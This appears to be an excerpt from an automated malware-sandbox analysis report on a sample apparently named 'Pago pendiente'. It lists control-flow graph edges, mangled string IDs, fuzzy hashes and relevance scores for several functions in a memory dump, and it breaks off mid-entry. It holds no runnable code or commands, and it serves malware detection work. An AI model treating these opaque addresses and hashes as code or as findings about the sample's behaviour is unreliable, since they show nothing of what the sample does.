                                                          • String ID: fjq$ fjq$ fjq$Teeq$Teeq$XXeq$XXeq$$eq$$eq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-1742843821
                                                          • Opcode ID: e88e097eabd6c6e91f5eab59ae435fcc168c1a34d04f3bca6d2fd2de5085e6fc
                                                          • Instruction ID: cb51925d416e06e7cc5f092a88bd071dfc227d31f2be94279345355390b7877c
                                                          • Opcode Fuzzy Hash: e88e097eabd6c6e91f5eab59ae435fcc168c1a34d04f3bca6d2fd2de5085e6fc
                                                          • Instruction Fuzzy Hash: 24B1B0B0E1412DDFCB15CF94C854AAEBBB2FB85341FA58455E422AB2D5CB309C42DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07720448 Relevance: 14.2, Strings: 11, Instructions: 453COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 417 7720448-7720483 575 7720488 call 7720b80 417->575 576 7720488 call 7720b71 417->576 418 772048e-77204fe call 77202f4 429 7720503-7720506 418->429 430 7720508 429->430 431 772050f-7720519 429->431 430->431 432 7720630-7720692 430->432 433 77207f0 430->433 434 7720731-772073b 430->434 435 7720697-77206aa 430->435 436 77207d4-77207e1 430->436 437 772053b-772057e 430->437 438 772071c-7720729 430->438 439 772059d-77205a3 430->439 440 77206c2-77206c6 430->440 441 7720580-772058a 430->441 442 7720787-772078b 430->442 443 7720605-772060f 430->443 444 77205ea-77205f1 430->444 445 77207e9-77207ee 430->445 446 772074e 430->446 447 772051f-772052d 431->447 448 77206ac 431->448 432->429 465 77207fd-7720800 433->465 461 7720751-7720776 434->461 462 772073d-7720749 434->462 449 77206b1 435->449 436->445 437->429 438->434 452 77205a5-77205a7 439->452 453 77205a9-77205b5 439->453 454 77206e7 440->454 455 77206c8-77206d1 440->455 450 7720596-772059b 441->450 451 772058c 441->451 457 77207ac 442->457 458 772078d-7720796 442->458 459 7720611 443->459 460 7720618-772061f 443->460 444->448 456 77205f7-7720600 444->456 464 772077b-772077e 445->464 446->461 447->448 463 7720533-7720539 447->463 448->449 467 77206b6-77206b9 449->467 466 7720591 450->466 451->466 469 77205b7-77205e5 452->469 453->469 472 77206ea-77206ec 454->472 470 77206d3-77206d6 455->470 471 77206d8-77206db 455->471 456->429 468 77207af-77207b1 457->468 474 7720798-772079b 458->474 475 772079d-77207a0 458->475 476 7720613 459->476 460->448 477 7720625-772062e 460->477 461->464 462->467 463->429 464->442 473 7720780 464->473 483 7720812-7720816 465->483 484 7720802 465->484 466->429 467->440 486 77206bb 467->486 499 77207b3-77207bd 468->499 500 77207cd-77207d2 468->500 469->429 488 77206e5 470->488 471->488 490 7720708-772070f 472->490 491 77206ee-77206f8 472->491 473->433 473->436 473->442 473->445 473->483 492 7720ad2-7720ad9 473->492 493 7720903-7720905 473->493 494 7720854-7720858 473->494 495 77209f5-7720a85 473->495 496 772090a-7720983 473->496 497 7720a8a-7720aa1 473->497 498 77209a8-77209b6 473->498 485 77207aa 474->485 475->485 476->429 477->476 501 7720818-7720821 483->501 502 7720839 483->502 484->483 484->492 484->493 484->494 484->495 484->496 484->497 484->498 485->468 486->433 486->434 486->436 486->438 486->440 486->442 486->445 486->446 486->496 488->472 490->461 506 7720711-772071a 490->506 491->461 505 77206fa-7720701 491->505 493->465 503 772085a-7720863 494->503 504 772087b 494->504 495->465 566 7720985-772098b 496->566 567 772099b-77209a3 496->567 542 7720aa3-7720aa9 497->542 543 7720ab9 497->543 529 77209b8-77209be 498->529 530 77209ce-77209e0 call 772b23c 498->530 511 77207f3-77207f8 499->511 512 77207bf-77207c6 499->512 500->436 508 77207cb 500->508 514 7720823-7720826 501->514 515 7720828-7720835 501->515 523 772083c-7720846 502->523 517 7720865-7720868 503->517 518 772086a-7720877 503->518 516 772087e-77208e8 504->516 521 7720706 505->521 506->521 508->464 511->465 512->508 525 7720837 514->525 515->525 564 7720900 516->564 565 77208ea-77208f0 516->565 526 7720879 517->526 518->526 521->467 535 7720851 523->535 525->523 526->516 538 77209c2-77209c4 529->538 539 77209c0 529->539 553 77209e8-77209f0 530->553 535->494 538->530 539->530 547 7720aab 542->547 548 7720aad-7720aaf 542->548 577 7720abb call 772e338 543->577 578 7720abb call 772e329 543->578 547->543 548->543 552 7720ac1 557 7720ac8-7720acd 552->557 553->465 557->465 564->493 571 77208f2 565->571 572 77208f4-77208f6 565->572 569 772098f-7720991 566->569 570 772098d 566->570 567->465 569->567 570->567 571->564 572->564 575->418 576->418 577->552 578->552
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq$Teeq$Teeq$Teeq$Teeq$Teeq$Teeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-2274862041
                                                          • Opcode ID: 018490542d896f0c0b69dce8a29add28ef08d2955e2abc56f369e7785a08de8e
                                                          • Instruction ID: 06a60dce1922a90df7a45b2aa3cc8a7deff4158b18c96c8c9c726475f35da81c
                                                          • Opcode Fuzzy Hash: 018490542d896f0c0b69dce8a29add28ef08d2955e2abc56f369e7785a08de8e
                                                          • Instruction Fuzzy Hash: B2F1B0B4F10219DFDB109B69C819B7E7AB2FB88744F208425F452AB3C5DB749C42DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07721D36 Relevance: 14.0, Strings: 11, Instructions: 268COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 580 7721d36-7721d56 call 7721e46 584 7721d5b-7721d5e 580->584 585 7721d60 584->585 586 7721d67-7721d76 584->586 585->586 587 7722092-7722097 585->587 588 7721d95-7721d99 585->588 589 7721dc5 585->589 590 772204b-7722053 585->590 591 7722058-772206b 585->591 597 7721d78-7721d7f 586->597 598 7721d8e-7721d93 586->598 592 7721dcd-7721dd0 587->592 594 7721d9b-7721da4 588->594 595 7721dbc 588->595 589->592 590->592 618 772208b-7722090 591->618 619 772206d-7722074 591->619 599 7721de2-7721de6 592->599 600 7721dd2 592->600 602 7721da6-7721da9 594->602 603 7721dab-7721db8 594->603 596 7721dbf 595->596 596->589 605 7722185-772219d 597->605 606 7721d85 597->606 617 7721d8c 598->617 615 7721de8-7721df1 599->615 616 7721e09 599->616 600->587 600->590 600->591 600->599 607 7722162-7722176 600->607 608 7721f60-7721f64 600->608 609 7722114-772213e 600->609 610 7721e9b-7721ea5 600->610 611 7722179-7722182 600->611 612 7721faf-7721fc2 600->612 613 772209c-77220b2 600->613 614 7721ebc-7721ec0 600->614 604 7721dba 602->604 603->604 604->596 606->617 620 7721f66-7721f6f 608->620 621 7721f87 608->621 683 7722140 609->683 684 772214a-7722154 609->684 610->605 622 7721eab-7721eb7 610->622 612->605 648 7721fc8-7721fd0 612->648 651 77220b4-77220c6 613->651 652 77220c8 613->652 623 7721ec2-7721ecb 614->623 624 7721ee3 614->624 625 7721df3-7721df6 615->625 626 7721df8-7721e05 615->626 630 7721e0c-7721e0e 616->630 617->584 628 7722086 618->628 619->605 627 772207a-7722081 619->627 632 7721f71-7721f74 620->632 633 7721f76-7721f83 620->633 634 7721f8a-7721faa 621->634 622->592 636 7721ed2-7721edf 623->636 637 7721ecd-7721ed0 623->637 641 7721ee6-7721eea 624->641 638 7721e07 625->638 626->638 627->628 628->592 643 7721e10-7721e16 630->643 644 7721e26-7721e43 630->644 645 7721f85 632->645 633->645 634->592 646 7721ee1 636->646 637->646 638->630 649 7721f00 641->649 650 7721eec-7721efe 641->650 653 7721e1a-7721e24 643->653 654 7721e18 643->654 670 7721e66-7721e68 644->670 671 7721e45-7721e4e 644->671 645->634 646->641 659 7721fd2-7721fdb 648->659 660 7721ff3 648->660 661 7721f03-7721f07 649->661 650->661 662 77220cb-77220d8 651->662 652->662 653->644 654->644 664 7721fe2-7721fef 659->664 665 7721fdd-7721fe0 659->665 666 7721ff6-7721ff8 660->666 667 7721f28 661->667 668 7721f09-7721f12 661->668 689 77220f0-77220fd 662->689 690 77220da-77220e0 662->690 674 7721ff1 664->674 665->674 675 7722016 666->675 676 7721ffa-7722000 666->676 681 7721f2b-7721f4c 667->681 677 7721f14-7721f17 668->677 678 7721f19-7721f1c 668->678 672 7721e69-7721e92 call 77230d8 670->672 691 7721e55-7721e62 671->691 692 7721e4f-7721e53 671->692 710 7721e98 672->710 674->666 682 7722018-772201a 675->682 686 7722002-7722004 676->686 687 7722006-7722012 676->687 688 7721f26 677->688 678->688 681->605 704 7721f52-7721f5b 681->704 694 7722034-7722046 682->694 695 772201c-7722022 682->695 697 7722145 683->697 684->605 698 7722156-7722160 684->698 699 7722014 686->699 687->699 688->681 689->605 702 7722103-772210f 689->702 700 77220e2 690->700 701 77220e4-77220e6 690->701 703 7721e64 691->703 692->703 694->592 705 7722026-7722032 695->705 706 7722024 695->706 697->592 698->697 699->682 700->689 701->689 702->592 703->672 704->592 705->694 706->694 710->610
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fjq$ fjq$Teeq$XXeq$XXeq$XXeq$XXeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-1505009098
                                                          • Opcode ID: 546aae99e6dd62fabe51a86409283d34b479199695adc92707a0ff03984a9de0
                                                          • Instruction ID: f383dd3609e987a2546ac003acf6e635cb20c733d720b564188e277609775421
                                                          • Opcode Fuzzy Hash: 546aae99e6dd62fabe51a86409283d34b479199695adc92707a0ff03984a9de0
                                                          • Instruction Fuzzy Hash: C7A1A3B0E1422DDFDB15CF94C844AADB7B2FF41381F958856E522AB295C7309C43EB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07721DE1 Relevance: 12.7, Strings: 10, Instructions: 244COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 713 7721de1 714 7721de2-7721de6 713->714 715 7721de8-7721df1 714->715 716 7721e09 714->716 718 7721df3-7721df6 715->718 719 7721df8-7721e05 715->719 717 7721e0c-7721e0e 716->717 720 7721e10-7721e16 717->720 721 7721e26-7721e43 717->721 722 7721e07 718->722 719->722 724 7721e1a-7721e24 720->724 725 7721e18 720->725 728 7721e66-7721e68 721->728 729 7721e45-7721e4e 721->729 722->717 724->721 725->721 730 7721e69-7721e73 728->730 732 7721e55-7721e62 729->732 733 7721e4f-7721e53 729->733 734 7721e7e-7721e92 call 77230d8 730->734 735 7721e64 732->735 733->735 737 7721e98 734->737 735->730 738 7721e9b-7721ea5 737->738 739 7722185-772219d 738->739 740 7721eab-7721eb7 738->740 741 7721dcd-7721dd0 740->741 741->714 743 7721dd2 741->743 743->714 743->738 744 7722092-7722097 743->744 745 7722162-7722176 743->745 746 7721f60-7721f64 743->746 747 7722114-772213e 743->747 748 772204b-7722053 743->748 749 7722058-772206b 743->749 750 7722179-7722182 743->750 751 7721faf-7721fc2 743->751 752 772209c-77220b2 743->752 753 7721ebc-7721ec0 743->753 744->741 754 7721f66-7721f6f 746->754 755 7721f87 746->755 803 7722140 747->803 804 772214a-7722154 747->804 748->741 775 772208b-7722090 749->775 776 772206d-7722074 749->776 751->739 769 7721fc8-7721fd0 751->769 771 77220b4-77220c6 752->771 772 77220c8 752->772 756 7721ec2-7721ecb 753->756 757 7721ee3 753->757 759 7721f71-7721f74 754->759 760 7721f76-7721f83 754->760 763 7721f8a-7721faa 755->763 766 7721ed2-7721edf 756->766 767 7721ecd-7721ed0 756->767 762 7721ee6-7721eea 757->762 770 7721f85 759->770 760->770 773 7721f00 762->773 774 7721eec-7721efe 762->774 763->741 777 7721ee1 766->777 767->777 783 7721fd2-7721fdb 769->783 784 7721ff3 769->784 770->763 786 77220cb-77220d8 771->786 772->786 787 7721f03-7721f07 773->787 774->787 785 7722086 775->785 776->739 781 772207a-7722081 776->781 777->762 781->785 788 7721fe2-7721fef 783->788 789 7721fdd-7721fe0 783->789 790 7721ff6-7721ff8 784->790 785->741 807 77220f0-77220fd 786->807 808 77220da-77220e0 786->808 791 7721f28 787->791 792 7721f09-7721f12 787->792 794 7721ff1 788->794 789->794 795 7722016 790->795 796 7721ffa-7722000 790->796 800 7721f2b-7721f4c 791->800 798 7721f14-7721f17 792->798 799 7721f19-7721f1c 792->799 794->790 801 7722018-772201a 795->801 805 7722002-7722004 796->805 806 7722006-7722012 796->806 809 7721f26 798->809 799->809 800->739 819 7721f52-7721f5b 800->819 811 7722034-7722046 801->811 812 772201c-7722022 801->812 813 7722145 803->813 804->739 814 7722156-7722160 804->814 815 7722014 805->815 806->815 807->739 818 7722103-772210f 807->818 816 77220e2 808->816 817 77220e4-77220e6 808->817 809->800 811->741 820 7722026-7722032 812->820 821 7722024 812->821 813->741 814->813 815->801 816->807 817->807 818->741 819->741 820->811 821->811
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fjq$ fjq$Teeq$XXeq$XXeq$XXeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-2613762053
                                                          • Opcode ID: 20899d387e41b619bb8005a3aa9b6e1a033c19eb36028ce06c982788ba4971ab
                                                          • Instruction ID: 47fc70e422b3f90cd84fe8adcddce005671a626bfa3825b30eb7a5394ea1f8ab
                                                          • Opcode Fuzzy Hash: 20899d387e41b619bb8005a3aa9b6e1a033c19eb36028ce06c982788ba4971ab
                                                          • Instruction Fuzzy Hash: 2BA1A2B0E1423DDFDB25CF94C844AADB7B2FB41381F958856E522AB295C7309C43EB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07721DC8 Relevance: 10.2, Strings: 8, Instructions: 214COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 826 7721dc8 827 7721dcd-7721dd0 826->827 828 7721de2-7721de6 827->828 829 7721dd2 827->829 841 7721de8-7721df1 828->841 842 7721e09 828->842 829->828 830 7722092-7722097 829->830 831 7722162-7722176 829->831 832 7721f60-7721f64 829->832 833 7722114-772213e 829->833 834 772204b-7722053 829->834 835 7721e9b-7721ea5 829->835 836 7722058-772206b 829->836 837 7722179-7722182 829->837 838 7721faf-7721fc2 829->838 839 772209c-77220b2 829->839 840 7721ebc-7721ec0 829->840 830->827 843 7721f66-7721f6f 832->843 844 7721f87 832->844 909 7722140 833->909 910 772214a-7722154 833->910 834->827 845 7722185-772219d 835->845 846 7721eab-7721eb7 835->846 867 772208b-7722090 836->867 868 772206d-7722074 836->868 838->845 871 7721fc8-7721fd0 838->871 875 77220b4-77220c6 839->875 876 77220c8 839->876 847 7721ec2-7721ecb 840->847 848 7721ee3 840->848 849 7721df3-7721df6 841->849 850 7721df8-7721e05 841->850 851 7721e0c-7721e0e 842->851 853 7721f71-7721f74 843->853 854 7721f76-7721f83 843->854 855 7721f8a-7721faa 844->855 846->827 858 7721ed2-7721edf 847->858 859 7721ecd-7721ed0 847->859 862 7721ee6-7721eea 848->862 860 7721e07 849->860 850->860 864 7721e10-7721e16 851->864 865 7721e26-7721e43 851->865 866 7721f85 853->866 854->866 855->827 869 7721ee1 858->869 859->869 860->851 873 7721f00 862->873 874 7721eec-7721efe 862->874 877 7721e1a-7721e24 864->877 878 7721e18 864->878 896 7721e66-7721e68 865->896 897 7721e45-7721e4e 865->897 866->855 883 7722086 867->883 868->845 882 772207a-7722081 868->882 869->862 885 7721fd2-7721fdb 871->885 886 7721ff3 871->886 887 7721f03-7721f07 873->887 874->887 888 77220cb-77220d8 875->888 876->888 877->865 878->865 882->883 883->827 890 7721fe2-7721fef 885->890 891 7721fdd-7721fe0 885->891 892 7721ff6-7721ff8 886->892 893 7721f28 887->893 894 7721f09-7721f12 887->894 915 77220f0-77220fd 888->915 916 77220da-77220e0 888->916 900 7721ff1 890->900 891->900 901 7722016 892->901 902 7721ffa-7722000 892->902 907 7721f2b-7721f4c 893->907 903 7721f14-7721f17 894->903 904 7721f19-7721f1c 894->904 898 7721e69-7721e73 896->898 917 7721e55-7721e62 897->917 918 7721e4f-7721e53 897->918 922 7721e7e-7721e92 call 77230d8 898->922 900->892 908 7722018-772201a 901->908 912 7722002-7722004 902->912 913 7722006-7722012 902->913 914 7721f26 903->914 904->914 907->845 930 7721f52-7721f5b 907->930 920 7722034-7722046 908->920 921 772201c-7722022 908->921 923 7722145 909->923 910->845 924 7722156-7722160 910->924 925 7722014 912->925 913->925 914->907 915->845 928 7722103-772210f 915->928 926 77220e2 916->926 927 77220e4-77220e6 916->927 929 7721e64 917->929 918->929 920->827 931 7722026-7722032 921->931 932 7722024 921->932 936 7721e98 922->936 923->827 924->923 925->908 926->915 927->915 928->827 929->898 930->827 931->920 932->920 936->835
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: fjq$ fjq$Teeq$XXeq$$eq$$eq$$eq$$eq
                                                          • API String ID: 0-2400119280
                                                          • Opcode ID: 9a21a05ec8ffe0c57887a15257a664d084a4df2856eee96050c780c7b20fcda9
                                                          • Instruction ID: 8af784f12a819a07775abc19271ed373460ab6fc1b320f2dc0f3c088be6ef46b
                                                          • Opcode Fuzzy Hash: 9a21a05ec8ffe0c57887a15257a664d084a4df2856eee96050c780c7b20fcda9
                                                          • Instruction Fuzzy Hash: 33818FB0E1423DDFDB25CF94C844AADB7B2FB45381F958856E521AB291C7309C43EB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07720438 Relevance: 9.2, Strings: 7, Instructions: 400COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 939 7720438-7720443 940 7720448-7720483 939->940 1098 7720488 call 7720b80 940->1098 1099 7720488 call 7720b71 940->1099 941 772048e 942 7720494-77204fe call 77202f4 941->942 952 7720503-7720506 942->952 953 7720508 952->953 954 772050f-7720519 952->954 953->954 955 7720630-7720692 953->955 956 77207f0 953->956 957 7720731-772073b 953->957 958 7720697-77206aa 953->958 959 77207d4-77207e1 953->959 960 772053b-772057e 953->960 961 772071c-7720729 953->961 962 772059d-77205a3 953->962 963 77206c2-77206c6 953->963 964 7720580-772058a 953->964 965 7720787-772078b 953->965 966 7720605-772060f 953->966 967 77205ea-77205f1 953->967 968 77207e9-77207ee 953->968 969 772074e 953->969 970 772051f-772052d 954->970 971 77206ac 954->971 955->952 988 77207fd-7720800 956->988 984 7720751-7720776 957->984 985 772073d-7720749 957->985 972 77206b1 958->972 959->968 960->952 961->957 975 77205a5-77205a7 962->975 976 77205a9-77205b5 962->976 977 77206e7 963->977 978 77206c8-77206d1 963->978 973 7720596-772059b 964->973 974 772058c 964->974 980 77207ac 965->980 981 772078d-7720796 965->981 982 7720611 966->982 983 7720618-772061f 966->983 967->971 979 77205f7-7720600 967->979 987 772077b-772077e 968->987 969->984 970->971 986 7720533-7720539 970->986 971->972 990 77206b6-77206b9 972->990 989 7720591 973->989 974->989 992 77205b7-77205e5 975->992 976->992 995 77206ea-77206ec 977->995 993 77206d3-77206d6 978->993 994 77206d8-77206db 978->994 979->952 991 77207af-77207b1 980->991 997 7720798-772079b 981->997 998 772079d-77207a0 981->998 999 7720613 982->999 983->971 1000 7720625-772062e 983->1000 984->987 985->990 986->952 987->965 996 7720780 987->996 1006 7720812-7720816 988->1006 1007 7720802 988->1007 989->952 990->963 1009 77206bb 990->1009 1022 77207b3-77207bd 991->1022 1023 77207cd-77207d2 991->1023 992->952 1011 77206e5 993->1011 994->1011 1013 7720708-772070f 995->1013 1014 77206ee-77206f8 995->1014 996->956 996->959 996->965 996->968 996->1006 1015 7720ad2-7720ad9 996->1015 1016 7720903-7720905 996->1016 1017 7720854-7720858 996->1017 1018 77209f5-7720a85 996->1018 1019 772090a-7720983 996->1019 1020 7720a8a-7720aa1 996->1020 1021 77209a8-77209ab 996->1021 1008 77207aa 997->1008 998->1008 999->952 1000->999 1024 7720818-7720821 1006->1024 1025 7720839 1006->1025 1007->1006 1007->1015 1007->1016 1007->1017 1007->1018 1007->1019 1007->1020 1007->1021 1008->991 1009->956 1009->957 1009->959 1009->961 1009->963 1009->965 1009->968 1009->969 1009->1019 1011->995 1013->984 1029 7720711-772071a 1013->1029 1014->984 1028 77206fa-7720701 1014->1028 1016->988 1026 772085a-7720863 1017->1026 1027 772087b 1017->1027 1018->988 1089 7720985-772098b 1019->1089 1090 772099b-77209a3 1019->1090 1065 7720aa3-7720aa9 1020->1065 1066 7720ab9 1020->1066 1043 77209b4-77209b6 1021->1043 1034 77207f3-77207f8 1022->1034 1035 77207bf-77207c6 1022->1035 1023->959 1031 77207cb 1023->1031 1037 7720823-7720826 1024->1037 1038 7720828-7720835 1024->1038 1046 772083c-7720846 1025->1046 1040 7720865-7720868 1026->1040 1041 772086a-7720877 1026->1041 1039 772087e-77208e8 1027->1039 1044 7720706 1028->1044 1029->1044 1031->987 1034->988 1035->1031 1048 7720837 1037->1048 1038->1048 1087 7720900 1039->1087 1088 77208ea-77208f0 1039->1088 1049 7720879 1040->1049 1041->1049 1052 77209b8-77209be 1043->1052 1053 77209ce-77209e0 call 772b23c 1043->1053 1044->990 1058 7720851 1046->1058 1048->1046 1049->1039 1061 77209c2-77209c4 1052->1061 1062 77209c0 1052->1062 1076 77209e8-77209f0 1053->1076 1058->1017 1061->1053 1062->1053 1070 7720aab 1065->1070 1071 7720aad-7720aaf 1065->1071 1100 7720abb call 772e338 1066->1100 1101 7720abb call 772e329 1066->1101 1070->1066 1071->1066 1075 7720ac1 1080 7720ac8-7720acd 1075->1080 1076->988 1080->988 1087->1016 1094 77208f2 1088->1094 1095 77208f4-77208f6 1088->1095 1092 772098f-7720991 1089->1092 1093 772098d 1089->1093 1090->988 1092->1090 1093->1090 1094->1087 1095->1087 1098->941 1099->941 1100->1075 1101->1075
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Teeq$Teeq$Teeq$Teeq$Teeq$$eq$$eq
                                                          • API String ID: 0-3195343334
                                                          • Opcode ID: 889188a0da897a03b69781f797f6599981b23ff9197fa3c728d793ade2a73dc2
                                                          • Instruction ID: 128a36bf8b17975f2d0d439a60a61e810f846d4683d0b97ce0f3e8b42f68aaae
                                                          • Opcode Fuzzy Hash: 889188a0da897a03b69781f797f6599981b23ff9197fa3c728d793ade2a73dc2
                                                          • Instruction Fuzzy Hash: 1DE1C2B4B10214DFDB109B69D819B7E7AB2FB88745F208425F456EB3C4DB709C42DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 077210A8 Relevance: 8.9, Strings: 7, Instructions: 114COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1103 77210a8-77210c3 1104 77210ca-77210d0 1103->1104 1105 77210d2 1104->1105 1106 77210d9-7721136 1104->1106 1105->1106 1107 7721192-77211a3 1105->1107 1108 7721142-7721149 1105->1108 1109 772122b-772123c 1105->1109 1110 77211d8-77211e9 1105->1110 1111 772114e-772115f 1105->1111 1112 772120e-7721215 1105->1112 1114 772127c-7721286 1106->1114 1140 772113c 1106->1140 1107->1114 1120 77211a9-77211c0 1107->1120 1108->1104 1109->1114 1121 772123e-772127b 1109->1121 1110->1114 1122 77211ef-7721206 1110->1122 1111->1114 1123 7721165-772117c 1111->1123 1113 7721217-7721226 1112->1113 1112->1114 1113->1104 1120->1114 1132 77211c6-77211d3 1120->1132 1122->1114 1133 7721208 1122->1133 1123->1114 1131 7721182-772118d 1123->1131 1131->1104 1132->1104 1133->1112 1140->1108
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: LReq$LReq$LReq$LReq$$eq$$eq$$eq
                                                          • API String ID: 0-1693550593
                                                          • Opcode ID: d20788935c767f3011801145168c543ac5a6dfc8df7008f2bc1a38e07275569c
                                                          • Instruction ID: 4cf9f976ac22802f060b17bb8ae3ab726bd7fedf9c4db2914158d86ced11ebcd
                                                          • Opcode Fuzzy Hash: d20788935c767f3011801145168c543ac5a6dfc8df7008f2bc1a38e07275569c
                                                          • Instruction Fuzzy Hash: C7418CB4A0025DCBCB00CFA9C458A6FBBB1FF44300F64D899D4265B3A1D731AA46CB66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07720B80 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1141 7720b80-7720ba0 1142 7720ba5-7720ba8 1141->1142 1143 7720bb1-7720bb7 1142->1143 1144 7720baa 1142->1144 1151 7720c69-7720c73 1143->1151 1152 7720bbd-7720bc6 1143->1152 1144->1143 1145 7720c01 1144->1145 1146 7720bfa-7720bff 1144->1146 1147 7720bc8-7720bd6 1144->1147 1148 7720c29-7720c30 1144->1148 1149 7720c09-7720c1b 1144->1149 1150 7720c5f-7720c66 1144->1150 1145->1149 1146->1142 1156 7720bd8 1147->1156 1157 7720bdf-7720be6 1147->1157 1154 7720c32-7720c36 1148->1154 1155 7720c37-7720c39 1148->1155 1149->1151 1153 7720c1d-7720c24 1149->1153 1152->1142 1153->1142 1154->1155 1159 7720c45-7720c4f 1155->1159 1160 7720c3b 1155->1160 1162 7720bdd 1156->1162 1157->1151 1161 7720bec-7720bf8 1157->1161 1159->1151 1164 7720c51-7720c5d 1159->1164 1163 7720c40 1160->1163 1161->1146 1161->1162 1162->1142 1163->1142 1164->1150 1164->1163
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8iq$8iq$8iq$8iq
                                                          • API String ID: 0-3635788720
                                                          • Opcode ID: 76cc788d21696d3f61cd655dc003de4af56499357ddb10400bc2adfed22d45f9
                                                          • Instruction ID: 4058c9646465c394676b7b03c76b5797104bb438a4811fceff14e7a8f07c8076
                                                          • Opcode Fuzzy Hash: 76cc788d21696d3f61cd655dc003de4af56499357ddb10400bc2adfed22d45f9
                                                          • Instruction Fuzzy Hash: 5C213DF0618235CFD7288B69D8443FAB7A5FB42358F14853BE0B5C61A1C638D982D230
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07720758 Relevance: 2.7, Strings: 2, Instructions: 217COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $eq$$eq
                                                          • API String ID: 0-2246304398
                                                          • Opcode ID: c157d970edb4a76381dec7f57cc88177c0aff303a853ca8cf27c1c8508df7f74
                                                          • Instruction ID: b72ea5c63b5a6775c64f17d21dfba303129026b93d51e54cbef80f163189e5eb
                                                          • Opcode Fuzzy Hash: c157d970edb4a76381dec7f57cc88177c0aff303a853ca8cf27c1c8508df7f74
                                                          • Instruction Fuzzy Hash: 9281C1B4B10218DFDB109B65D8197BE7BB2FB85781F208429F456AB3D4CB709C42DBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 07720809 Relevance: 2.7, Strings: 2, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2020570131.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7720000_Pago pendiente.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $eq$$eq
                                                          • API String ID: 0-2246304398
                                                          • Opcode ID: fa0861353e611e75dc8c1268660520b183bdeca07bec75b8c53d79f1d3dc3282
                                                          • Instruction ID: 39d4b568d52a65c645fdd92eefb378ae1a0dec74837d04499f8205d5427976b9
